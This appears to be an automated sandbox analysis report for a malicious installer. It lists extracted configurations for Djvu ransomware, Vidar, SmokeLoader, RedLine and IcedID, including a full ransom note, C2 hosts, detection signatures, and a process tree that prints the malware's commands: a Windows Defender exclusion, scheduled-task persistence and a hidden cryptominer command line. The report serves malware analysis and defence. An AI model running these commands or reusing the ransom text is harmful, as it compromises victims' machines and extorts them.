Analysis
-
max time kernel
1803s -
max time network
1808s -
platform
windows7_x64 -
resource
win7-ja-20210916 -
submitted
16-09-2021 20:34
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
7b15ff87e11bd9bc7512b41635b68aeb
-
SHA1
3ddf56275a2132a384d251247f38cc086b6db914
-
SHA256
f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7
-
SHA512
d16b63a203a3322ec70f99a7ca692770c45710e2c0d50f24bf027d8d41d579d721e8cf5f20cc95436b1640b821b8efe1a3c617232cdc18c13be0e37431f7baab
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Family
djvu
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-CtDpAM1g5f
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0333gSd743dfRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
URLs
https://we.tl/t-CtDpAM1g5f
Extracted
Family
vidar
Version
40.6
Botnet
706
C2
https://dimonbk83.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
smokeloader
Version
2020
C2
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
medianew
C2
91.121.67.60:62102
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
icedid
Campaign
1721901314
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 3 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Possible Kelihos.F EXE Download Common Structure
suricata: ET MALWARE Possible Kelihos.F EXE Download Common Structure
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
VMProtect packed file 4 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 34 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 6 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 36 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 14 IoCs
-
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 9 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 37 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS864EC813\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu115049bf2e.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu115049bf2e.exeThu115049bf2e.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6256900.scr"C:\Users\Admin\AppData\Roaming\6256900.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2808 -s 16807⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Users\Admin\AppData\Roaming\2764123.scr"C:\Users\Admin\AppData\Roaming\2764123.scr" /S6⤵
-
-
C:\Users\Admin\AppData\Roaming\4299185.scr"C:\Users\Admin\AppData\Roaming\4299185.scr" /S6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\5702169.scr"C:\Users\Admin\AppData\Roaming\5702169.scr" /S6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11b9fee5fd5b3c.exeThu11b9fee5fd5b3c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-P1F05.tmp\Thu11b9fee5fd5b3c.tmp"C:\Users\Admin\AppData\Local\Temp\is-P1F05.tmp\Thu11b9fee5fd5b3c.tmp" /SL5="$40136,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11b9fee5fd5b3c.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-E8ELU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E8ELU.tmp\Setup.exe" /Verysilent7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"9⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118764660749a3b.exeThu118764660749a3b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu117e9466431bbb9f.exeThu117e9466431bbb9f.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu117e9466431bbb9f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu117e9466431bbb9f.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu117e9466431bbb9f.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu116d4ab7efb7.exeThu116d4ab7efb7.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11787d2b833e6.exeThu11787d2b833e6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu113e650b5e.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu112e5981b78.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1160e2804caf.exeThu1160e2804caf.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5623931.exe"C:\ProgramData\5623931.exe"8⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1796 -s 16529⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\ProgramData\5476993.exe"C:\ProgramData\5476993.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\5476993.exe"C:\ProgramData\5476993.exe"9⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 8089⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\ProgramData\7910667.exe"C:\ProgramData\7910667.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Modifies data under HKEY_USERS
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2176 -s 8008⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "9⤵
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exeinst.exe10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exeinst.exe11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\booster\booster.exe"C:\Users\Admin\AppData\Local\Temp\booster.\booster.exe"14⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Terminal8427\hoders\kllk.vbs" /f=CREATE_NO_WINDOW install.cmd15⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Terminal8427\hoders\end.bat" "16⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 717⤵
- Delays execution with timeout.exe
-
-
C:\Terminal8427\hoders\winfss.exe"winfss.exe" e -pfisiHihsd7s8ksd8 pom.rar17⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\timeout.exetimeout 617⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout 817⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Terminal8427\hoders\1q.vbs"17⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Terminal8427\hoders\shellst.bat" "18⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Terminal8427"19⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\timeout.exetimeout 219⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Delays execution with timeout.exe
-
-
C:\Terminal8427\hoders\kerclean.exekerclean.exe /start19⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Terminal8427\hoders\kerclean.exekerclean.exe /start20⤵
- Executes dropped EXE
- Modifies system certificate store
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winfss.exe19⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winfss.exe19⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\Terminal8427\hoders"19⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\timeout.exetimeout 419⤵
- Executes dropped EXE
- Delays execution with timeout.exe
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exeFoxyIDM82.exe10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-9U4JL.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9U4JL.tmp\setup_2.tmp" /SL5="$401CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5BAB7.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-5BAB7.tmp\setup_2.tmp" /SL5="$501CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-27CQN.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-27CQN.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"13⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"14⤵
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"15⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dllRRKFdPhuU.dll"13⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dllRRKFdPhuU.dll"14⤵
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exeThu1170fdf4c09b1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exeC:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1BQfx77⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:275457 /prefetch:28⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1171b1ca5023f5d2.exeThu1171b1ca5023f5d2.exe5⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 916 -s 8006⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11f1187a97f50d9c.exeThu11f1187a97f50d9c.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\mrZcYGtsjX9vOMhNiai00wUQ.exe"C:\Users\Admin\Documents\mrZcYGtsjX9vOMhNiai00wUQ.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exeThu118c8b4c3885d897d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exeC:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1189012621353ba47.exeThu1189012621353ba47.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 9486⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19392130-1637321304189820756619819120961734476501267570914-229532620677669624"1⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\CFDC.exeC:\Users\Admin\AppData\Local\Temp\CFDC.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\13DE.exeC:\Users\Admin\AppData\Local\Temp\13DE.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\13DE.exeC:\Users\Admin\AppData\Local\Temp\13DE.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
-
